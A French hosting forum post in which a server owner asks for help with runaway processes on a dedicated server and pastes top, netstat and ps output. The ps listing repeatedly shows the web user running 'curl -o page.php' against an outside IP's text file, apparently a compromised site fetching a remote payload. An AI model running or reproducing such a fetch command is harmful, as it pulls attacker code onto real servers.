Dédié : les process s'emballent et surchargent

bobdeo · 2 Juin 2007

Bonjour à tous,

Depuis 1h cette nuit, j'ai un gros pb sur mon dédié (OVH Release 2).

Les process s'emballent (je suis passé de plus de 90 à plus de 200). La mémoire suit et le serveur swap...

Aucune modification n'a été faite sur ce serveur depuis des lustres (hors patch évidemment)...

Par où commencer ?

Merci pour votre aide

top - 13:49:42 up 64 days,  2:14,  1 user,  load average: 0.18, 0.28, 0.39
Tasks: 167 total,   2 running, 165 sleeping,   0 stopped,   0 zombie
Cpu(s):  7.0% us,  0.7% sy,  0.0% ni, 92.0% id,  0.3% wa,  0.0% hi,  0.0% si
Mem:	506732k total,   409428k used,	97304k free,	 6648k buffers
Swap:   522104k total,   152576k used,   369528k free,	80160k cached

  PID USER	  PR  NI  VIRT  RES  SHR S %CPU %MEM	TIME+  COMMAND																									  
27445 mediabb   17   0 24124  12m 3960 S  6.0  2.6   0:00.18 php																										  
25862 nobody	15   0  6360 2148 1352 S  0.3  0.4   0:00.04 httpd																										
	1 root	  15   0  1476  448  432 S  0.0  0.1   0:07.32 init																										 
	2 root	  RT   0	 0	0	0 S  0.0  0.0   0:00.00 migration/0																								  
	3 root	  34  19	 0	0	0 S  0.0  0.0   0:00.25 ksoftirqd/0																								  
	4 root	  10  -5	 0	0	0 S  0.0  0.0   0:00.00 events/0																									 
	5 root	  14  -5	 0	0	0 S  0.0  0.0   0:00.00 khelper																									  
	6 root	  10  -5	 0	0	0 S  0.0  0.0   0:00.00 kthread																									  
	9 root	  10  -5	 0	0	0 S  0.0  0.0   0:43.25 kblockd/0																									
   10 root	  10  -5	 0	0	0 S  0.0  0.0   0:00.00 kseriod																									  
   98 root	  10  -5	 0	0	0 S  0.0  0.0   0:43.19 kswapd0																									  
   99 root	  20  -5	 0	0	0 S  0.0  0.0   0:00.00 aio/0																										
  100 root	  20  -5	 0	0	0 S  0.0  0.0   0:00.00 xfslogd/0																									
  101 root	  20  -5	 0	0	0 S  0.0  0.0   0:00.00 xfsdatad/0																								   
  726 root	  11  -5	 0	0	0 S  0.0  0.0   0:00.00 ata/0																										
  727 root	  11  -5	 0	0	0 S  0.0  0.0   0:00.00 ata_aux																									  
  730 root	  10  -5	 0	0	0 S  0.0  0.0   0:00.00 scsi_eh_0																									
  731 root	  10  -5	 0	0	0 S  0.0  0.0   0:00.00 scsi_eh_1																									
  752 root	  10  -5	 0	0	0 S  0.0  0.0   0:00.00 kpsmoused																									
  755 root	  11  -5	 0	0	0 S  0.0  0.0   0:00.00 kcryptd/0																									
  760 root	  10  -5	 0	0	0 S  0.0  0.0   6:19.10 kjournald																									
  873 root	  10  -5	 0	0	0 S  0.0  0.0   0:33.51 kjournald																									
 1568 root	  15   0  1812  588  456 S  0.0  0.1   0:37.26 syslog-ng																									
 2384 mysql	 18   0  114m  39m 2984 S  0.0  8.1   1:18.23 mysqld																									   
 2389 mysql	 15   0  114m  39m 2984 S  0.0  8.1   1:29.73 mysqld																									   
 2390 mysql	 18   0  114m  39m 2984 S  0.0  8.1   6:41.69 mysqld																									   
 2401 mysql	 23   0  114m  39m 2984 S  0.0  8.1   0:00.00 mysqld																									   
 2430 qmails	16   0  1504  364  308 S  0.0  0.1   0:04.66 qmail-send																								   
 2431 root	  18   0  1320  216  204 S  0.0  0.0   0:00.36 tai64n																									   
 2432 qmaill	18   0  1468  304  288 S  0.0  0.1   0:00.43 multilog																									 
 2433 root	  16   0  1532  372  368 S  0.0  0.1   0:00.37 tcpserver																									
 2434 root	  25   0  1320  200  196 S  0.0  0.0   0:00.00 tai64n																									   
 2435 qmaill	23   0  1472  264  264 S  0.0  0.1   0:00.00 multilog																									 
 2436 vpopmail  18   0  1532  420  396 S  0.0  0.1   0:01.54 tcpserver																									
 2437 root	  18   0  1316  220  204 S  0.0  0.0   0:00.26 tai64n																									   
 2438 qmaill	18   0  1468  304  288 S  0.0  0.1   0:00.41 multilog																									 
 2470 root	  18   0  1464  296  268 S  0.0  0.1   0:00.28 qmail-lspawn																								 
 2471 qmailr	15   0  1464  260  260 S  0.0  0.1   0:00.00 qmail-rspawn																								 
 2472 qmailq	18   0  1456  292  272 S  0.0  0.1   0:00.31 qmail-clean																								  
 2483 root	  18   0  3400  572  568 S  0.0  0.1   0:28.57 sshd																										 
 2637 root	  15   0  2836  728  612 S  0.0  0.1  37:10.30 collectd																									 
 2719 root	  18   0  1464  312  308 S  0.0  0.1   0:00.00 courierlogger																								
 2720 root	  18   0  1976  468  440 S  0.0  0.1   0:00.01 authdaemond																								  
 2734 root	  18   0  1976  304  276 S  0.0  0.1   0:00.20 authdaemond																								  
 2735 root	  18   0  1976  304  276 S  0.0  0.1   0:00.15 authdaemond

ns23065 ~ # netstat -tanpu
Connexions Internet actives (serveurs et ?tablies)
Proto Recv-Q Send-Q Adresse locale		  Adresse distante		Etat		PID/Program name   
tcp		0	  0 0.0.0.0:110			 0.0.0.0:*			   LISTEN	  2433/tcpserver	  
tcp		0	  0 127.0.0.1:783		   0.0.0.0:*			   LISTEN	  2933/local.cf	   
tcp		0	  0 0.0.0.0:143			 0.0.0.0:*			   LISTEN	  2747/couriertcpd	
tcp		0	  0 0.0.0.0:80			  0.0.0.0:*			   LISTEN	  24729/httpd		 
tcp		0	  0 0.0.0.0:10000		   0.0.0.0:*			   LISTEN	  2406/perl		   
tcp		0	  0 127.0.0.1:53			0.0.0.0:*			   LISTEN	  24808/named		 
tcp		0	  0 91.121.10.101:53		0.0.0.0:*			   LISTEN	  24808/named		 
tcp		0	  0 0.0.0.0:21			  0.0.0.0:*			   LISTEN	  2837/proftpd: (acce 
tcp		0	  0 0.0.0.0:22			  0.0.0.0:*			   LISTEN	  2483/sshd		   
tcp		0	  0 127.0.0.1:953		   0.0.0.0:*			   LISTEN	  24808/named		 
tcp		0	  0 0.0.0.0:25			  0.0.0.0:*			   LISTEN	  2436/tcpserver	  
tcp		0	  0 0.0.0.0:443			 0.0.0.0:*			   LISTEN	  24729/httpd		 
tcp		0	  0 91.121.10.101:80		90.3.143.58:3744		ESTABLISHED 26899/httpd		 
tcp		0	  0 91.121.10.101:80		86.66.187.168:60487	 ESTABLISHED 25863/httpd		 
tcp		0	  0 91.121.10.101:80		82.125.69.107:3396	  ESTABLISHED 27295/httpd		 
tcp		0	  0 91.121.10.101:80		82.240.232.143:50528	ESTABLISHED 27462/httpd		 
tcp		0	  0 91.121.10.101:80		86.66.138.185:1637	  ESTABLISHED 25996/httpd		 
tcp		0   1657 91.121.10.101:80		82.65.78.68:2783		LAST_ACK	-				   
tcp		1	  0 91.121.10.101:80		82.250.148.59:3872	  CLOSE_WAIT  26736/httpd		 
tcp		0	  0 91.121.10.101:80		86.200.103.59:2913	  ESTABLISHED 25571/httpd		 
tcp		0   2526 91.121.10.101:80		82.251.223.124:48714	LAST_ACK	-				   
tcp		0	  0 91.121.10.101:80		86.66.138.185:1537	  ESTABLISHED 26785/httpd		 
tcp		0	  0 91.121.10.101:80		88.122.57.188:3695	  TIME_WAIT   -				   
tcp		1	  0 91.121.10.101:80		82.64.31.89:3863		CLOSE_WAIT  24737/httpd		 
tcp		0	  0 91.121.10.101:80		66.249.70.23:34390	  ESTABLISHED 26577/httpd		 
tcp		0	  0 91.121.10.101:80		86.66.187.168:60429	 ESTABLISHED 24920/httpd		 
tcp		1	  0 91.121.10.101:80		172.185.131.97:11270	CLOSE_WAIT  26883/httpd		 
tcp		0	  0 91.121.10.101:80		86.204.13.234:1169	  ESTABLISHED 27460/httpd		 
tcp		0	  0 91.121.10.101:80		74.6.69.19:57227		ESTABLISHED 26902/httpd		 
tcp		1	  0 91.121.10.101:80		86.193.241.111:49316	CLOSE_WAIT  26903/httpd		 
tcp		0	  1 91.121.10.101:52797	 200.89.188.195:80	   SYN_SENT	27381/curl		  
tcp		0	  1 91.121.10.101:52796	 200.89.188.195:80	   SYN_SENT	27367/curl		  
tcp		0	  1 91.121.10.101:52799	 200.89.188.195:80	   SYN_SENT	27388/curl		  
tcp		0	  1 91.121.10.101:52798	 200.89.188.195:80	   SYN_SENT	27385/curl		  
tcp		0	  1 91.121.10.101:52792	 200.89.188.195:80	   SYN_SENT	27362/curl		  
tcp		0	  1 91.121.10.101:52789	 200.89.188.195:80	   SYN_SENT	27299/curl		  
tcp		0	  1 91.121.10.101:52788	 200.89.188.195:80	   SYN_SENT	27288/curl		  
tcp		0	  1 91.121.10.101:52791	 200.89.188.195:80	   SYN_SENT	27359/curl		  
tcp		0	  1 91.121.10.101:52790	 200.89.188.195:80	   SYN_SENT	27313/curl		  
tcp		0	  1 91.121.10.101:52787	 200.89.188.195:80	   SYN_SENT	27285/curl		  
tcp		0	  1 91.121.10.101:52786	 200.89.188.195:80	   SYN_SENT	27281/curl		  
tcp		1	  0 91.121.10.101:80		82.64.31.89:3678		CLOSE_WAIT  26824/httpd		 
tcp		0	  0 91.121.10.101:80		88.122.57.188:3719	  FIN_WAIT2   -				   
tcp		0	  1 91.121.10.101:52809	 200.89.188.195:80	   SYN_SENT	27497/curl		  
tcp		0	  1 91.121.10.101:52808	 200.89.188.195:80	   SYN_SENT	27472/curl		  
tcp		0	  1 91.121.10.101:52810	 200.89.188.195:80	   SYN_SENT	27502/curl		  
tcp		0	  1 91.121.10.101:52805	 200.89.188.195:80	   SYN_SENT	27459/curl		  
tcp		0	  1 91.121.10.101:52804	 200.89.188.195:80	   SYN_SENT	27454/curl		  
tcp		0	  1 91.121.10.101:52807	 200.89.188.195:80	   SYN_SENT	27469/curl		  
tcp		0	  1 91.121.10.101:52806	 200.89.188.195:80	   SYN_SENT	27465/curl		  
tcp		0	  1 91.121.10.101:52801	 200.89.188.195:80	   SYN_SENT	27443/curl		  
tcp		0	  1 91.121.10.101:52800	 200.89.188.195:80	   SYN_SENT	27432/curl		  
tcp		0	  1 91.121.10.101:52803	 200.89.188.195:80	   SYN_SENT	27450/curl		  
tcp		0	  1 91.121.10.101:52802	 200.89.188.195:80	   SYN_SENT	27447/curl		  
tcp		0   7920 91.121.10.101:22		81.57.34.83:49713	   ESTABLISHED 24356/0			 
tcp		0   1657 91.121.10.101:80		81.49.226.217:4044	  LAST_ACK	-				   
tcp		1	  0 91.121.10.101:80		88.191.29.127:43195	 CLOSE_WAIT  24848/httpd		 
tcp		0   1657 91.121.10.101:80		82.242.55.118:1109	  LAST_ACK	-				   
tcp		1	  0 91.121.10.101:80		88.161.197.69:3206	  CLOSE_WAIT  26233/httpd		 
tcp		1	  0 91.121.10.101:80		81.49.226.217:4271	  CLOSE_WAIT  27282/httpd		 
tcp		0	  0 91.121.10.101:80		213.41.146.25:1538	  ESTABLISHED 26022/httpd		 
tcp		0   2526 91.121.10.101:80		82.232.120.208:60097	LAST_ACK	-				   
tcp		0	  1 91.121.10.101:46852	 200.89.188.195:80	   SYN_SENT	27190/curl		  
tcp		0	  1 91.121.10.101:46854	 200.89.188.195:80	   SYN_SENT	27193/curl		  
tcp		0	  1 91.121.10.101:46855	 200.89.188.195:80	   SYN_SENT	27196/curl		  
tcp		0	  1 91.121.10.101:46856	 200.89.188.195:80	   SYN_SENT	27241/curl		  
tcp		0	  1 91.121.10.101:46857	 200.89.188.195:80	   SYN_SENT	27244/curl		  
tcp		0	  0 91.121.10.101:80		193.248.98.108:1306	 ESTABLISHED 25862/httpd		 
tcp		0	  0 91.121.10.101:80		74.6.85.217:50951	   TIME_WAIT   -				   
tcp		0	  0 91.121.10.101:80		213.251.136.194:34108   ESTABLISHED 24785/httpd		 
tcp		1	  0 91.121.10.101:80		82.240.232.143:50525	CLOSE_WAIT  25499/httpd		 
tcp		1	  0 91.121.10.101:80		88.138.212.97:2420	  CLOSE_WAIT  25511/httpd		 
tcp		0	  0 91.121.10.101:80		72.30.177.91:34620	  ESTABLISHED 24835/httpd		 
tcp		0	  0 91.121.10.101:80		83.197.240.93:1120	  ESTABLISHED 26888/httpd		 
udp		0	  0 0.0.0.0:49163		   0.0.0.0:*						   24808/named		 
udp		0	  0 0.0.0.0:10000		   0.0.0.0:*						   2406/perl		   
udp		0	  0 0.0.0.0:49171		   0.0.0.0:*						   27477/perl		  
udp		0	  0 127.0.0.1:53			0.0.0.0:*						   24808/named		 
udp		0	  0 91.121.10.101:53		0.0.0.0:*						   24808/named

ns23065 ~ # ps auxw
USER	   PID %CPU %MEM	VSZ   RSS TTY	  STAT START   TIME COMMAND
root		 1  0.0  0.0   1476   448 ?		Ss   Mar30   0:07 init [3]  
root		 2  0.0  0.0	  0	 0 ?		S	Mar30   0:00 [migration/0]
root		 3  0.0  0.0	  0	 0 ?		SN   Mar30   0:00 [ksoftirqd/0]
root		 4  0.0  0.0	  0	 0 ?		S<   Mar30   0:00 [events/0]
root		 5  0.0  0.0	  0	 0 ?		S<   Mar30   0:00 [khelper]
root		 6  0.0  0.0	  0	 0 ?		S<   Mar30   0:00 [kthread]
root		 9  0.0  0.0	  0	 0 ?		S<   Mar30   0:43 [kblockd/0]
root		10  0.0  0.0	  0	 0 ?		S<   Mar30   0:00 [kseriod]
root		98  0.0  0.0	  0	 0 ?		S<   Mar30   0:43 [kswapd0]
root		99  0.0  0.0	  0	 0 ?		S<   Mar30   0:00 [aio/0]
root	   100  0.0  0.0	  0	 0 ?		S<   Mar30   0:00 [xfslogd/0]
root	   101  0.0  0.0	  0	 0 ?		S<   Mar30   0:00 [xfsdatad/0]
root	   726  0.0  0.0	  0	 0 ?		S<   Mar30   0:00 [ata/0]
root	   727  0.0  0.0	  0	 0 ?		S<   Mar30   0:00 [ata_aux]
root	   730  0.0  0.0	  0	 0 ?		S<   Mar30   0:00 [scsi_eh_0]
root	   731  0.0  0.0	  0	 0 ?		S<   Mar30   0:00 [scsi_eh_1]
root	   752  0.0  0.0	  0	 0 ?		S<   Mar30   0:00 [kpsmoused]
root	   755  0.0  0.0	  0	 0 ?		S<   Mar30   0:00 [kcryptd/0]
root	   760  0.0  0.0	  0	 0 ?		S<   Mar30   6:19 [kjournald]
root	   873  0.0  0.0	  0	 0 ?		S<   Mar30   0:33 [kjournald]
root	  1568  0.0  0.1   1812   588 ?		Ss   Mar30   0:37 /usr/sbin/syslog-ng
mysql	 2384  0.0  5.8 120900 29772 ?		Ss   Mar30   1:18 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mysql	 2389  0.0  5.8 120900 29772 ?		S	Mar30   1:29 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mysql	 2390  0.0  5.8 120900 29772 ?		S	Mar30   6:41 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mysql	 2401  0.0  5.8 120900 29772 ?		S	Mar30   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
qmails	2430  0.0  0.0   1504   364 ?		S	Mar30   0:04 qmail-send
root	  2431  0.0  0.0   1320   216 ?		S	Mar30   0:00 /usr/local/bin/tai64n
qmaill	2432  0.0  0.0   1468   304 ?		S	Mar30   0:00 /usr/local/bin/multilog /var/log/qmail/
root	  2433  0.0  0.0   1532   372 ?		S	Mar30   0:00 tcpserver -H -R -c100 0 pop-3 /var/qmail/bin/qmail-popup ns23065.ovh.net /home/vpopmail/bin/vchkpw /var/q
root	  2434  0.0  0.0   1320   200 ?		S	Mar30   0:00 /usr/local/bin/tai64n
qmaill	2435  0.0  0.0   1472   264 ?		S	Mar30   0:00 /usr/local/bin/multilog /var/log/qmailpop3/
vpopmail  2436  0.0  0.0   1532   420 ?		S	Mar30   0:01 tcpserver -H -R -x /etc/tcp.smtp.cdb -c100 -u508 -g503 0 smtp /var/qmail/bin/qmail-smtpd
root	  2437  0.0  0.0   1316   220 ?		S	Mar30   0:00 /usr/local/bin/tai64n
qmaill	2438  0.0  0.0   1468   304 ?		S	Mar30   0:00 /usr/local/bin/multilog /var/log/qmailsmtp/
root	  2470  0.0  0.0   1464   296 ?		S	Mar30   0:00 qmail-lspawn ./Maildir/
qmailr	2471  0.0  0.0   1464   260 ?		S	Mar30   0:00 qmail-rspawn
qmailq	2472  0.0  0.0   1456   292 ?		S	Mar30   0:00 qmail-clean
root	  2483  0.0  0.1   3400   572 ?		Ss   Mar30   0:28 /usr/sbin/sshd
root	  2637  0.0  0.1   2836   728 ?		Ss   Mar30  37:10 /usr/sbin/collectd
root	  2719  0.0  0.0   1464   312 ?		S	Mar30   0:00 /usr/sbin/courierlogger -pid=/var/run/authdaemon.pid -start /usr/lib/courier/courier-authlib/authdaemond
root	  2720  0.0  0.0   1976   468 ?		S	Mar30   0:00 /usr/lib/courier/courier-authlib/authdaemond
root	  2734  0.0  0.0   1976   304 ?		S	Mar30   0:00 /usr/lib/courier/courier-authlib/authdaemond
root	  2735  0.0  0.0   1976   304 ?		S	Mar30   0:00 /usr/lib/courier/courier-authlib/authdaemond
root	  2736  0.0  0.0   1976   304 ?		S	Mar30   0:00 /usr/lib/courier/courier-authlib/authdaemond
root	  2737  0.0  0.0   1976   308 ?		S	Mar30   0:00 /usr/lib/courier/courier-authlib/authdaemond
root	  2738  0.0  0.0   1976   304 ?		S	Mar30   0:00 /usr/lib/courier/courier-authlib/authdaemond
root	  2747  0.0  0.0   1556   364 ?		S	Mar30   0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/courierlogger -stderrlog
root	  2749  0.0  0.0   1464   372 ?		S	Mar30   0:00 /usr/lib/courier-imap/courierlogger imapd
nobody	2837  0.0  0.1   6972   632 ?		Ss   Mar30   0:00 proftpd: (accepting connections)	  
root	  2933  0.0  0.4  22368  2520 ?		Ss   Mar30   0:14 /usr/sbin/spamd -d -r /var/run/spamd/spamd.pid -m 5 -H -u qscand -v -x --siteconfigpath=/etc/spamassassin
root	  2981  0.0  0.0   1464   312 ?		S	Mar30   0:00 /usr/sbin/courierlogger -pid=/usr/lib/sqwebmail/var/run/sqwebmaild.pid -facility=mail -start /usr/lib/sqw
root	  2982  0.0  0.1   3404   568 ?		S	Mar30   0:00 /usr/lib/sqwebmail/libexec/sqwebmail/sqwebmaild
root	  3022  0.0  0.1   1724   576 ?		Ss   Mar30   0:01 /usr/sbin/cron
root	  3070  0.0  0.2   1516  1516 ?		SLs  Mar30   0:00 /usr/sbin/watchdog
root	  3243  0.0  0.0   1472   380 tty1	 Ss+  Mar30   0:00 /sbin/agetty 38400 tty1 linux
root	  3244  0.0  0.0   1472   376 tty2	 Ss+  Mar30   0:00 /sbin/agetty 38400 tty2 linux
root	  3246  0.0  0.0   1472   376 tty3	 Ss+  Mar30   0:00 /sbin/agetty 38400 tty3 linux
root	  3248  0.0  0.0   1476   376 tty4	 Ss+  Mar30   0:00 /sbin/agetty 38400 tty4 linux
root	  3250  0.0  0.0   1476   376 tty5	 Ss+  Mar30   0:00 /sbin/agetty 38400 tty5 linux
root	  3255  0.0  0.0   1472   376 tty6	 Ss+  Mar30   0:00 /sbin/agetty 38400 tty6 linux
root	  3257  0.0  0.0   1476   376 ttyS0	Ss+  Mar30   0:00 /sbin/agetty 9600 ttyS0 vt100
qscand	 945  0.0  2.0  42544 10604 ?		Ss   May27   0:49 /usr/sbin/clamd
clamav	 953  0.0  0.1   2744   592 ?		Ss   May27   0:00 /usr/bin/freshclam -d
qscand	2365  0.0  2.0  42544 10604 ?		S	May27   0:00 /usr/sbin/clamd
root	  2406  0.0  0.2   8256  1488 ?		Ss   May29   0:00 /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
qscand   31916  0.0  0.4  22764  2092 ?		S	May31   0:00 spamd child
qscand   23332  0.0  3.0  25216 15372 ?		S	Jun01   0:23 spamd child
root	 11367  0.0  0.0   3404	12 ?		S	Jun01   0:00 /usr/lib/sqwebmail/libexec/sqwebmail/sqwebmaild
root	 11369  0.0  0.0   3404	12 ?		S	Jun01   0:00 /usr/lib/sqwebmail/libexec/sqwebmail/sqwebmaild
root	 11371  0.0  0.0   3404	12 ?		S	Jun01   0:00 /usr/lib/sqwebmail/libexec/sqwebmail/sqwebmaild
root	 11373  0.0  0.0   3404	12 ?		S	Jun01   0:00 /usr/lib/sqwebmail/libexec/sqwebmail/sqwebmaild
root	 11375  0.0  0.0   3404	12 ?		S	Jun01   0:00 /usr/lib/sqwebmail/libexec/sqwebmail/sqwebmaild
root	 21801  0.0  0.0	  0	 0 ?		S	12:57   0:00 [pdflush]
root	 24113  0.0  0.0	  0	 0 ?		S	13:20   0:00 [pdflush]
root	 24356  0.0  0.2   6364  1360 ?		Ss   13:22   0:00 sshd: root_AT_pts/0 
root	 24391  0.0  0.2   2892  1384 pts/0	Ss   13:23   0:00 -bash
root	 24729  0.0  0.3   5948  1816 ?		Ss   13:25   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   24737  0.0  0.3   6384  2012 ?		S	13:25   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   24785  0.0  0.4   6360  2060 ?		S	13:25   0:00 /usr/local/apache/bin/httpd -k start -DSSL
named	24808  0.0  0.4   5504  2196 ?		Ss   13:25   0:00 /usr/sbin/named -u named -n 1
nobody   24814  0.0  0.4   6408  2144 ?		S	13:25   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   24835  0.0  0.4   6400  2072 ?		S	13:26   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   24848  0.0  0.4   6408  2088 ?		S	13:26   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   24920  0.0  0.4   6408  2180 ?		S	13:26   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   25017  0.0  0.4   6408  2044 ?		S	13:28   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   25499  0.0  0.4   6360  2068 ?		S	13:32   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   25511  0.0  0.4   6408  2276 ?		S	13:32   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   25571  0.0  0.4   6360  2028 ?		S	13:33   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   25862  0.0  0.3   6360  2020 ?		S	13:34   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   25863  0.0  0.3   6360  2024 ?		S	13:34   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   25996  0.0  0.4   6408  2240 ?		S	13:35   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   26022  0.0  0.4   6408  2264 ?		S	13:35   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   26233  0.0  0.4   6384  2152 ?		S	13:38   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   26577  0.0  0.4   6360  2120 ?		S	13:40   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   26578  0.0  0.4   6376  2160 ?		S	13:40   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   26736  0.0  0.4   6408  2044 ?		S	13:42   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   26785  0.0  0.3   6196  2016 ?		S	13:42   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   26824  0.0  0.3   6188  1936 ?		S	13:43   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   26883  0.0  0.3   6408  2024 ?		S	13:43   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   26888  0.0  0.3   6148  1892 ?		S	13:43   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   26899  0.0  0.3   6408  2004 ?		S	13:43   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   26902  0.0  0.4   6384  2128 ?		S	13:43   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   26903  0.0  0.4   6360  2120 ?		S	13:43   0:00 /usr/local/apache/bin/httpd -k start -DSSL
mediabb  27279  0.0  2.5  24120 12892 ?		S	13:47   0:00 /usr/local/php5/bin/php
mysql	27280  0.0  5.8 120900 29772 ?		S	13:47   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27281  0.0  0.2   3240  1476 ?		S	13:47   0:00 curl -o page.php 200.89.188.195/stnc.txt
nobody   27282  0.0  0.3   6080  1764 ?		S	13:47   0:00 /usr/local/apache/bin/httpd -k start -DSSL
mediabb  27283  0.0  2.5  24120 12892 ?		S	13:47   0:00 /usr/local/php5/bin/php
mysql	27284  0.0  5.8 120900 29772 ?		S	13:47   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27285  0.0  0.2   3240  1476 ?		S	13:47   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27286  0.0  2.5  24124 12896 ?		S	13:47   0:00 /usr/local/php5/bin/php
mysql	27287  0.0  5.8 120900 29772 ?		S	13:47   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27288  0.0  0.2   3244  1480 ?		S	13:47   0:00 curl -o page.php 200.89.188.195/stnc.txt
nobody   27289  0.0  0.3   6080  1764 ?		S	13:47   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   27295  0.0  0.3   6080  1760 ?		S	13:47   0:00 /usr/local/apache/bin/httpd -k start -DSSL
mediabb  27297  0.0  2.5  24124 12952 ?		S	13:47   0:00 /usr/local/php5/bin/php
mysql	27298  0.0  5.8 120900 29772 ?		S	13:47   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27299  0.0  0.2   3240  1476 ?		S	13:47   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27311  0.1  2.5  24120 12944 ?		S	13:48   0:00 /usr/local/php5/bin/php
mysql	27312  0.0  5.8 120900 29772 ?		S	13:48   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27313  0.0  0.2   3244  1480 ?		S	13:48   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27357  0.1  2.5  24124 12940 ?		S	13:48   0:00 /usr/local/php5/bin/php
mysql	27358  0.0  5.8 120900 29772 ?		S	13:48   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27359  0.0  0.2   3244  1480 ?		S	13:48   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27360  0.1  2.5  24124 12940 ?		S	13:48   0:00 /usr/local/php5/bin/php
mysql	27361  0.0  5.8 120900 29772 ?		S	13:48   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27362  0.0  0.2   3244  1480 ?		S	13:48   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27365  0.1  2.5  24120 12944 ?		S	13:48   0:00 /usr/local/php5/bin/php
mysql	27366  0.0  5.8 120900 29772 ?		S	13:48   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27367  0.0  0.2   3244  1476 ?		S	13:48   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27379  0.1  2.5  24124 12896 ?		S	13:49   0:00 /usr/local/php5/bin/php
mysql	27380  0.0  5.8 120900 29772 ?		S	13:49   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27381  0.0  0.2   3240  1476 ?		S	13:49   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27383  0.1  2.5  24120 12892 ?		S	13:49   0:00 /usr/local/php5/bin/php
mysql	27384  0.0  5.8 120900 29772 ?		S	13:49   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27385  0.0  0.2   3244  1476 ?		S	13:49   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27386  0.1  2.5  24120 12896 ?		S	13:49   0:00 /usr/local/php5/bin/php
mysql	27387  0.0  5.8 120900 29772 ?		S	13:49   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27388  0.0  0.2   3244  1476 ?		S	13:49   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27430  0.1  2.5  24120 12944 ?		S	13:49   0:00 /usr/local/php5/bin/php
mysql	27431  0.0  5.8 120900 29772 ?		S	13:49   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27432  0.0  0.2   3240  1476 ?		S	13:49   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27441  0.2  2.5  24124 12896 ?		S	13:49   0:00 /usr/local/php5/bin/php
mysql	27442  0.0  5.8 120900 29772 ?		S	13:49   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27443  0.0  0.2   3244  1476 ?		S	13:49   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27445  0.2  2.5  24124 12940 ?		S	13:49   0:00 /usr/local/php5/bin/php
